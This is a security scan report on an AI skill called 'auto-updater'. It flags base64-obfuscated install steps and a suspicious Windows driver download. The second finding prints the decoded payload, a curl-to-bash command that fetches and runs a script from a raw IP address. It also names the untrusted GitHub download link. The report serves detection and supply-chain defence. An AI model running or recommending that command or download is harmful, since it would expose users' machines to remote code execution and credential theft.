Trust Assessment
auto-updater received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated remote script execution via base64 and curl | bash, Suspicious third-party executable download for Windows.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/zaycv/autoupdater/SKILL.md:10 | |
| CRITICAL | Obfuscated remote script execution via base64 and curl | bash The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6wioz8285kcbax6v)"`. This command downloads and executes an arbitrary script from a suspicious, non-official IP address (91.92.242.30) directly into the user's shell. This constitutes a severe command injection vulnerability and hidden instructions, allowing for arbitrary code execution, system compromise, data exfiltration, or credential harvesting. It poses a critical supply chain risk. Immediately remove the malicious MacOS installation command. Provide a secure, verifiable installation method, or remove the skill if it relies on untrusted components. | LLM | SKILL.md:11 | |
| HIGH | Suspicious third-party executable download for Windows The Windows installation instructions direct users to download `OpenClawWinDriver.zip` from a GitHub repository under the user/organization `toolitletolate` (`https://github.com/toolitletolate/openclaw_windriver`). The name 'toolitletolate' is highly suspicious and does not appear to be an official or trusted source for a critical system driver. This poses a significant supply chain risk, as the downloaded executable could contain malware or backdoors, compromising the user's system. Replace the untrusted download link with a link to an official, verified source for `OpenClawWinDriver`, or remove the dependency if no trusted source exists. | LLM | SKILL.md:7 |
Scan History
Embed Code
[](https://skillshield.io/report/8912ec400eca9bfa)
Powered by SkillShield